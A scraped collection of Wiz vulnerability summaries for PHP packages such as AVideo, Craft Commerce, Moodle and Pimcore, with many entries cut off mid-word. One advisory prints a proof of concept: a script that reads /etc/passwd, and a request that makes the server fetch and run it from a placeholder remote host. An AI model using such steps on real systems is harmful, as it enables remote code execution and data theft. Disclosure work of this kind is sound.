Severity HIGH
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 42.6
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
baserproject/basercms
Wiz · blogs_wiz · CVSS 5.4 · MEDIUM
CVE-2026-33683 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33683 : PHP vulnerability analysis and mitigation
xss_esc()
strip_specific_tags()
html_entity_decode()
Source : NVD
Score 5.4
Published March 23, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 26, 2026
## GHSA-h9r9-2pxg-cx9m : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz): GHSA-h9r9-2pxg-cx9m Impact, Exploitability, and Mitigation Steps | Wiz
## Summary
A stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator's browser. This occurs because the Shipping Zone (Name & Description) fields in the Store Management section are not properly sanitized before being displayed in the admin panel.
## Proof of Concept
## Requirements
- Access the control panel
- Access Craft Commerce
- Manage store settings
- Manage shipping
- An active administrator elevated session
## Steps to Reproduce
1. Log in to the Admin Panel with the attacker account with the permissions mentioned above.
2. Go to `/admin/commerce/store-management/primary/shippingzones`
3. Create a new shipping zone.
4. In the Name field, enter the following payload:
## GHSA-5j8p-438x-rgg5 (CVE-2025-66475) [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 5.3): GHSA-5j8p-438x-rgg5 Impact, Exploitability, and Mitigation Steps | Wiz
## Summary
There is a critical vulnerability in xmlseclibs, CVE-2025-66475, a dependency of php-saml.
Update to one of the following versions of php-saml, which force the use of patched versions of xmlseclibs:
- 2.21.1
- 3.8.1
- 4.3.1
## Impact
Signature wrapping vulnerabilities allow an attacker to impersonate a user.
Source : NVD
## 9.3
Score
Published December 9, 2025
Severity CRITICAL
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
onelogin/php-saml
Sources
NVD
Composer Severity CRITICAL Has Fix Added at: Dec 09, 2
## CVE-2026-35168 [HIGH] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 8.8): CVE-2026-35168 Impact, Exploitability, and Mitigation Steps | Wiz
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further
## CVE-2026-29093 [HIGH] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 8.1): CVE-2026-29093 Impact, Exploitability, and Mitigation Steps | Wiz
WWBN AVideo is an open source video platform. Prior to version 24.0, the official docker-compose.yml publishes the memcached service on host port 11211 (0.0.0.0:11211) with no authentication, while the Dockerfile configures PHP to store all user sessions in that memcached instance. An attacker who can reach port 11211 can read, modify, or flush session data — enabling session hijacking, admin impersonation, and mass session destruction without any application-level authentication. This issue has been patched in version 24.0.
Source : NVD
## 9.8
Score
Published March 6, 2026
Severity CRITICAL
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV D
## CVE-2026-22243 [HIGH] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 8.7): CVE-2026-22243 Impact, Exploitability, and Mitigation Steps | Wiz
Referenced identifiers: `Nextmatch`, `WHERE`, `is_int()`
Source : NVD
## 8.7
Score
Published January 28, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
egroupware/egroupware
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 29, 2026
## CVE-2025-14177 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 6.3): CVE-2025-14177 Impact, Exploitability, and Mitigation Steps | Wiz
In PHP versions:8.1.* before 8.1.34, 8.2.* before 8.2.30, 8.3.* before 8.3.29, 8.4.* before 8.4.16, 8.5.* before 8.5.1, the getimagesize() function may leak uninitialized heap memory into the APPn segments (e.g., APP1) when reading images in multi-chunk mode (such as via php://filter). This occurs due to a bug in php_read_stream_all_chunks() that overwrites the buffer without advancing the pointer, leaving tail bytes uninitialized. This may lead to information disclosure of sensitive heap data and affect the confidentiality of the target server.
Source : NVD
## 6.3
Score
Published December 27, 2025
Severity MEDIUM
CNA Score 6.3
Affected Technologies
PHP
Rocky Linux
Has Public Exploit Yes
Has CISA KEV Exploit No
C
## CVE-2026-28507 [HIGH] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 8.6): CVE-2026-28507 Impact, Exploitability, and Mitigation Steps | Wiz
Idno is a social publishing platform. Prior to version 1.6.4, there is a remote code execution vulnerability via chained import file write and template path traversal. This issue has been patched in version 1.6.4.
Source : NVD
## 8.6
Score
Published March 6, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 63.8
Exploitation Probability (EPSS) 0.5
Affected packages and libraries
idno/known
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 03, 2026
## CVE-2026-0895 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 5.2): CVE-2026-0895 Impact, Exploitability, and Mitigation Steps | Wiz
The extension extends TYPO3's FileSpool component, which was vulnerable to Insecure Deserialization prior to TYPO3-CORE-SA-2026-004 https://typo3.org/security/advisory/typo3-core-sa-2026-004 . Since the related fix is overwritten by the extension, using the extension with a patched TYPO3 core version still allows for Insecure Deserialization, because the affected vulnerable code was extracted from TYPO3 core to the extension. More information about this vulnerability can be found in the related TYPO3 Core Security Advisory TYPO3-CORE-SA-2026-004 https://typo3.org/security/advisory/typo3-core-sa-2026-004 .
Source : NVD
## 5.2
Score
Published January 20, 2026
Severity MEDIUM
CNA Score 5.2
Affected Technologies
PHP
Has P
## CVE-2026-34728 [HIGH] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 8.7): CVE-2026-34728 Impact, Exploitability, and Mitigation Steps | Wiz
phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, the MediaBrowserController::index() method handles file deletion for the media browser. When the fileRemove action is triggered, the user-supplied name parameter is concatenated with the base upload directory path without any path traversal validation. The FILTER_SANITIZE_SPECIAL_CHARS filter only encodes HTML special characters (&, ', ", <, >) and characters with ASCII value < 32, and does not prevent directory traversal sequences like ../. Additionally, the endpoint does not validate CSRF tokens, making it exploitable via CSRF attacks. This issue has been patched in version 4.1.1.
Source : NVD
## 8.7
Score
Published April 2, 2026
Severity HIGH
CNA Sc
## CVE-2025-67855 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 5.4): CVE-2025-67855 Impact, Exploitability, and Mitigation Steps | Wiz
A flaw was found in moodle. A remote attacker could exploit a reflected Cross-Site Scripting (XSS) vulnerability in the policy tool return URL. This vulnerability arises from insufficient sanitization of URL parameters, allowing attackers to inject malicious scripts through specially crafted links. Successful exploitation could lead to information disclosure or arbitrary client-side script execution within the user's browser.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS)
## CVE-2026-21448 [HIGH] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 8.9): CVE-2026-21448 Impact, Exploitability, and Mitigation Steps | Wiz
Referenced term: `add address`
Source : NVD
## 8.9
Score
Published January 2, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 36.8
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
bagisto/bagisto
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 03, 2026
## GHSA-5q8v-j673-m5v4 : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz): GHSA-5q8v-j673-m5v4 Impact, Exploitability, and Mitigation Steps | Wiz
## Summary
Affected endpoints: `GET /api/v1/users`, `GET /api/v1/users/{id}`
## Affected Endpoints
- `GET /api/v1/users` (`UserController::index`, line 94): lists ALL users with full details. No role check.
- `GET /api/v1/users/{id}` (`UserController::show`, line 126): shows any user's details by ID. No role check.
## Root Cause (1-of-N Inconsistency)
Other methods in the same controller properly check for the 'owner' role:
- `store()` via `UserStoreRequest::authorize()`: `auth()->user()->hasRole('owner')`
- `destroy()`: `$this->repository->hasRole($admin, 'owner')`
- `index()` and `show()`: no role check
Route definitions: `routes/api.php:734-747`, middleware `auth:api`
## Exposed Data
`UserTransformer` exposes: `email`, `role`, `blocked`, `blocked_code`, `created_at`, `updated_at`
## Impact
Any authenticated user can:
Enumer
## CVE-2026-29173 [LOW] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 1.9): CVE-2026-29173 Impact, Exploitability, and Mitigation Steps | Wiz
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 4.10.2 and 5.5.3, a stored XSS vulnerability exists when a user tries to update the Order Status from the Commerce Orders Table. The Order Status Name is rendered without proper escaping, allowing script execution to occur. This vulnerability is fixed in 4.10.2 and 5.5.3.
Source : NVD
## 1.9
Score
Published March 10, 2026
Severity LOW
CNA Score 1.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/commerce
Sources
NVD
Composer Severity LOW Has Fix Adde
## CVE-2025-66843 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 5.4): CVE-2025-66843 Impact, Exploitability, and Mitigation Steps | Wiz
grav before v1.7.49.5 has a Stored Cross-Site Scripting (Stored XSS) vulnerability in the page editing functionality. An authenticated low-privileged user with permission to edit content can inject malicious JavaScript payloads into editable fields. The payload is stored on the server and later executed when any other user views or edits the affected page.
Source : NVD
## 5.4
Score
Published December 15, 2025
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
getgrav/grav
Sources
NVD
Composer S
## CVE-2026-27461 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 6.9): CVE-2026-27461 Impact, Exploitability, and Mitigation Steps | Wiz
Pimcore is an Open Source Data & Experience Management Platform. In versions up to and including 11.5.14.1 and 12.3.2, the filter query parameter in the dependency listing endpoints is JSON-decoded and the value field is concatenated directly into RLIKE clauses without sanitization or parameterized queries. Exploiting this issue requires admin authentication. An attacker with admin panel access can extract the full database including password hashes of other admin users. Version 12.3.3 contains a patch.
Source : NVD
## 6.9
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploit
## CVE-2026-27012 [CRITICAL] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 9.8): CVE-2026-27012 Impact, Exploitability, and Mitigation Steps | Wiz
OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, a privilege escalation and authentication bypass vulnerability in OpenSTAManager allows any attacker to arbitrarily change a user's group (idgruppo) by directly calling modules/utenti/actions.php. This can promote an existing account (e.g. agent) into the Amministratori group as well as demote any user including existing administrators.
Source : NVD
## 9.8
Score
Published March 3, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.1
Exploitation Pro
## CVE-2026-33319 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 5.9): CVE-2026-33319 Impact, Exploitability, and Mitigation Steps | Wiz
Referenced identifiers: `uploadVideoToLinkedIn()`, `escapeshellarg()`
Source : NVD
## 7.5
Score
Published March 22, 2026
Severity HIGH
CNA Score 5.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 20, 2026
## CVE-2018-25157 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 5.1): CVE-2018-25157 Impact, Exploitability, and Mitigation Steps | Wiz
Phraseanet 4.0.3 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts through crafted file names during document uploads. Attackers can upload files with embedded SVG scripts that execute in the browser, potentially stealing cookies or redirecting users when the file is viewed.
Source : NVD
## 5.1
Score
Published February 11, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
phraseanet/phraseanet
Sources
NVD
Composer Severity MEDIUM
## CVE-2026-4202 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 5.3): CVE-2026-4202 Impact, Exploitability, and Mitigation Steps | Wiz
The extension fails to verify whether an authenticated user has permission to access redirects, resulting in exposure of redirect records when editing a page.
Source : NVD
## 2.3
Score
Published March 17, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ayacoo/redirect-tab
Sources
NVD
Composer Severity LOW Has Fix Added at: Mar 19, 2026
## CVE-2026-32756 [HIGH] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 8.8): CVE-2026-32756 Impact, Exploitability, and Mitigation Steps | Wiz
Admidio is an open-source user management solution. Versions 5.0.6 and below contain a critical unrestricted file upload vulnerability in the Documents & Files module. Due to a design flaw in how CSRF token validation and file extension verification interact within UploadHandlerFile.php, an authenticated user with upload permissions can bypass file extension restrictions by intentionally submitting an invalid CSRF token. This allows the upload of arbitrary file types, including PHP scripts, which may lead to Remote Code Execution on the server, resulting in full server compromise, data exfiltration, and lateral movement. This issue has been fixed in version 5.0.7.
Source : NVD
## 8.8
Score
Published March 20, 2026
Sever
## CVE-2026-27198 [HIGH] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 8.8): CVE-2026-27198 Impact, Exploitability, and Mitigation Steps | Wiz
Formwork is a flat file-based Content Management System (CMS). In versions 2.0.0 through 2.3.3, the application fails to properly enforce role-based authorization during account creation. Although the system validates that the specified role exists, it does not verify whether the current user has sufficient privileges to assign highly privileged roles such as admin. As a result, an authenticated user with the editor role can create a new account with administrative privileges, leading to full administrative access and complete compromise of the CMS. This issue has been fixed in version 2.3.4.
Source : NVD
## 8.8
Score
Published February 21, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploi
## CVE-2026-33492 [HIGH] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 7.3): CVE-2026-33492 Impact, Exploitability, and Mitigation Steps | Wiz
Referenced identifiers: `_session_start()`, `PHPSESSID`, `User::login()`
Source : NVD
## 7.3
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## CVE-2026-31819 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 6.9): CVE-2026-31819 Impact, Exploitability, and Mitigation Steps | Wiz
Sylius is an Open Source eCommerce Framework on Symfony. CurrencySwitchController::switchAction(), ImpersonateUserController::impersonateAction() and StorageBasedLocaleSwitcher::handle() use the HTTP Referer header directly when redirecting. The attack requires the victim to click a legitimate application link placed on an attacker-controlled page. The browser automatically sends the attacker's site as the Referer, and the application redirects back to it. This can be used for phishing or credential theft, as the redirect originates from a trusted domain. The severity varies by endpoint; public endpoints require no authentication and are trivially exploitable, while admin-only endpoints require an authenticated session but rem
## CVE-2026-30878 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 5.3): CVE-2026-30878 Impact, Exploitability, and Mitigation Steps | Wiz
baserCMS is a website development framework. Prior to version 5.2.3, a public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API. This issue has been patched in version 5.2.3.
Source : NVD
## 5.3
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12
Exploitation Probability (EPSS) N/A
Affected packages and libraries
baserproject/basercms
Sources
## CVE-2026-35541 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 5.3): CVE-2026-35541 Impact, Exploitability, and Mitigation Steps | Wiz
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. Incorrect password comparison in the password plugin could lead to type confusion that allows a password change without knowing the old password.
Source : NVD
## 4.2
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 4.2
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube/roundcubemail
roundcube
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Echo Severity MEDIUM Has Fix Added at: Apr 05, 2026
## CVE-2026-25522 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 6.1): CVE-2026-25522 Impact, Exploitability, and Mitigation Steps | Wiz
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Shipping Zone (Name & Description) fields in the Store Management section are not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 6.1
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.5
E
## CVE-2026-27593 [CRITICAL] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 9.3): CVE-2026-27593 Impact, Exploitability, and Mitigation Steps | Wiz
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 6.3.3 and 5.73.10, an attacker may leverage a vulnerability in the password reset feature to capture a user's token and reset the password on their behalf. The attacker must know the email address of a valid account on the site, and the actual user must blindly click the link in their email even though they didn't request the reset. This has been fixed in 6.3.3 and 5.73.10.
Source : NVD
## 8.8
Score
Published February 24, 2026
Severity HIGH
CNA Score 9.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.9
Expl
## CVE-2026-1196 [LOW] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 2.3): CVE-2026-1196 Impact, Exploitability, and Mitigation Steps | Wiz
A security vulnerability has been detected in MineAdmin 1.x/2.x. Affected is an unknown function of the file /system/getFileInfoById. Manipulation of the argument ID leads to information disclosure. The attack can be launched remotely, but it requires a high level of complexity, and exploitability is reported to be difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 2.3
Score
Published January 20, 2026
Severity LOW
CNA Score 2.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (
## CVE-2026-23492 [HIGH] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 8.8): CVE-2026-23492 Impact, Exploitability, and Mitigation Steps | Wiz
Pimcore is an Open Source Data & Experience Management Platform. Prior to 12.3.1 and 11.5.14, an incomplete SQL injection patch in the Admin Search Find API allows an authenticated attacker to perform blind SQL injection. Although CVE-2023-30848 attempted to mitigate SQL injection by removing SQL comments (--) and catching syntax errors, the fix is insufficient. Attackers can still inject SQL payloads that do not rely on comments and infer database information via blind techniques. This vulnerability affects the admin interface and can lead to database information disclosure. This vulnerability is fixed in 12.3.1 and 11.5.14.
Source : NVD
## 4.9
Score
Published January 14, 2026
Severity MEDIUM
CNA Score 8.8
Affected T
## CVE-2026-32757 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 5.4): CVE-2026-32757 Impact, Exploitability, and Mitigation Steps | Wiz
Admidio is an open-source user management solution. In versions 5.0.6 and below, the eCard send handler uses a raw $_POST['ecard_message'] value instead of the HTMLPurifier-sanitized $formValues['ecard_message'] when constructing the greeting card HTML. This allows an authenticated attacker to inject arbitrary HTML and JavaScript into greeting card emails sent to other members, bypassing the server-side HTMLPurifier sanitization that is properly applied to the ecard_message field during form validation. An attack can result in any member or role receiving phishing content that appears legitimate, crossing from the web application into recipients' email clients. This issue has been fixed in version 5.0.7.
Source : NVD
## 5.4
## CVE-2026-34733 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 6.5): CVE-2026-34733 Impact, Exploitability, and Mitigation Steps | Wiz
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo installation script install/deleteSystemdPrivate.php contains a PHP operator precedence bug in its CLI-only access guard. The script is intended to run exclusively from the command line, but the guard condition !php_sapi_name() === 'cli' never evaluates to true due to how PHP resolves operator precedence. The ! (logical NOT) operator binds more tightly than === (strict comparison), causing the expression to always evaluate to false, which means the die() statement never executes. As a result, the script is accessible via HTTP without authentication and will delete files from the server's temp directory while also disclosing the temp directory
## GHSA-pr3g-phhr-h8fh : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz): GHSA-pr3g-phhr-h8fh Impact, Exploitability, and Mitigation Steps | Wiz
## Summary
A vulnerability has been identified that allows an authenticated administrator to execute arbitrary code on the host server. By modifying the binary path settings for built-in network tools and bypassing an input filter, an attacker with administrative privileges can download and execute malicious payloads.
## Details
Referenced paths: `/settings/external/binaries`, `GET /ajax/netcmd`
## PoC
`malicious.sh`:
```bash
#!/usr/bin/env bash
cat /etc/passwd
cat /etc/group
whoami
pwd
ls
```
Host a remote HTTP server that the server can reach and place the malicious script on the remote server. For demonstration, I will start it on localhost.
Request referencing `malicious.sh`:
`GET /ajax/netcmd?cmd=whois&query={remote http server's ip address}/malicious.sh`
## Imp
## CVE-2025-67851 [MEDIUM] : PHP vulnerability analysis and mitigation
Wiz (blogs_wiz · CVSS 6.1): CVE-2025-67851 Impact, Exploitability, and Mitigation Steps | Wiz
A flaw was found in moodle. This formula injection vulnerability occurs when data fields are exported without proper escaping. A remote attacker could exploit this by providing malicious data that, when exported and opened in a spreadsheet, allows arbitrary formulas to execute. This can lead to compromised data integrity and unintended operations within the spreadsheet.
Source: NVD
Score: 7.8 | Published: February 3, 2026 | Severity: HIGH | CNA Score: 6.1
Affected Technologies: PHP, NixOS
Has Public Exploit: No | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile 15)
Affected packages and libraries: moodle/moodle, moodle
CVE-2026-33513 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.6)
## CVE-2026-33513 [HIGH]: PHP vulnerability analysis and mitigation
Identifiers referenced: `APIName=locale`, `include`, `view/about.php`
Source: NVD
Score: 7.5 | Published: March 23, 2026 | Severity: HIGH | CNA Score: 8.6
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: 0.2 (percentile 38.7)
Affected packages and libraries: wwbn/avideo
Sources: NVD; Composer (Severity HIGH, No Fix, Added at: Mar 21, 2026)
CVE-2026-28781 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 7.1)
## CVE-2026-28781 [HIGH]: PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 4.17.0-beta.1 and 5.9.0-beta.1, the entry creation process allows for Mass Assignment of the authorId attribute. A user with "Create Entries" permission can inject the authorIds[] (or authorId) parameter into the POST request, which the backend processes without verifying if the current user is authorized to assign authorship to others. Normally, this field is not present in the request for users without the necessary permissions. By manually adding this parameter, an attacker can attribute the new entry to any user, including Admins. This effectively "spoofs" the authorship. This vulnerability is fixed in 4.17.0-beta.1 and 5.9.0-beta.1.
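The defence against this kind of mass assignment is to decide server-side which fields a caller may set, based on permissions rather than on which inputs the form happened to render. The following is an added example, not Craft's code; the field and permission names are invented for the illustration.

```php
<?php
// Added example, not Craft's code: allowlist the fields a request may set,
// keyed on the caller's permissions, before mass-assigning them to a model.
// Field and permission names are invented for the illustration.

function assignableFields(array $userPermissions): array
{
    // Fields anyone with "createEntries" may set.
    $fields = ['title', 'slug', 'body'];
    // Fields that additionally require a specific permission.
    $gated = [
        'assignAuthorship' => ['authorId', 'authorIds'],
        'publishEntries'   => ['enabled', 'postDate'],
    ];
    foreach ($gated as $permission => $names) {
        if (in_array($permission, $userPermissions, true)) {
            array_push($fields, ...$names);
        }
    }
    return $fields;
}

function buildEntry(array $request, array $userPermissions, int $currentUserId): array
{
    $allowed = assignableFields($userPermissions);
    // Anything not on the allowlist is dropped, whether or not the form ever
    // showed it; a hand-added authorIds[] therefore never reaches the model.
    $entry = array_intersect_key($request, array_flip($allowed));
    // Authorship defaults to the caller unless the caller may reassign it.
    if (!isset($entry['authorId']) && !isset($entry['authorIds'])) {
        $entry['authorId'] = $currentUserId;
    }
    return $entry;
}

// Constructed request: a contributor (user 42) trying to credit the entry to
// the admin account (user 1) and to publish it.
$request = ['title' => 'Hello', 'body' => '...', 'authorIds' => [1], 'enabled' => true];

var_export(buildEntry($request, ['createEntries'], 42));
echo "\n";
var_export(buildEntry($request, ['createEntries', 'assignAuthorship'], 42));
echo "\n";
```

With only `createEntries`, the entry keeps `title` and `body` and is attributed to user 42; with `assignAuthorship` added, the supplied `authorIds` survives. The important property is that the allowlist is the only path to the model, so the check cannot be skipped by a client that knows the parameter name.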
Source: NVD
Score: 7.1
Publi
CVE-2025-67847 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.8)
## CVE-2025-67847 [HIGH]: PHP vulnerability analysis and mitigation
A flaw was found in Moodle. An attacker with access to the restore interface could trigger server-side execution of arbitrary code. This is due to insufficient validation of restore input, which leads to unintended interpretation by core restore routines. Successful exploitation could result in a full compromise of the Moodle application.
Source: NVD
Score: 8.8 | Published: January 23, 2026 | Severity: HIGH | CNA Score: 8.8
Affected Technologies: PHP, NixOS
Has Public Exploit: No | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: N/A (percentile 13.3)
Affected packages and libraries: moodle, moodle/moodle
Sources: NVD; Composer Severit
CVE-2026-33507 Impact, Exploitability, and Mitigation Steps | Wiz (blogs_wiz, CVSS 8.8)
## CVE-2026-33507 [HIGH]: PHP vulnerability analysis and mitigation
Identifiers referenced: `objects/pluginImport.json.php`, `session.cookie_samesite = 'None'`
Source: NVD
Score: 8.8 | Published: March 23, 2026 | Severity: HIGH | CNA Score: 8.8
Affected Technologies: PHP
Has Public Exploit: Yes | Has CISA KEV Exploit: No | CISA KEV Release Date: N/A | CISA KEV Due Date: N/A
EPSS: 0.1 (percentile 18.2)
Affected packages and libraries: wwbn/avideo
Sources: NVD; Composer (Severity HIGH, No Fix, Added at: Mar 21, 2026)
